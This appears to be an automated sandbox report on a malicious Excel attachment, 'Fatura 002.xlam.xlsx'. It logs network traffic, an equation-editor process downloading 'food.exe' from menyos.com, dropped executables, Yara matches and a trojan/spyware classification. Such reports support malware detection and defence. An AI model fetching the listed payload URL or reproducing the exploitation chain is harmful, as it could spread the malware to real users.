Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036706E2 URLDownloadToFileW,

2_2_036706E2

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe

Jump to behavior

Source: global traffic

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: menyos.com

Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com//m/
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/5m/
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exe
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exefj
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exej
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeuj
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

Source: unknown

HTTPS traffic detected: 104.21.35.109:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE

Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00263BA0	6_2_00263BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00268C30	6_2_00268C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0026F488	6_2_0026F488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0026BFA8	6_2_0026BFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_002647B8	6_2_002647B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00263EE8	6_2_00263EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00462150	6_2_00462150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00466F20	6_2_00466F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00469928	6_2_00469928

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Fatura 002.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Yara signature match

Source: sheet1.xml, type: SAMPLE

Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/5@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Fatura 002.xlam.xlsx

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR87F3.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Fatura 002.xlam.xlsx	Virustotal: Detection: 50%
Source: Fatura 002.xlam.xlsx	ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
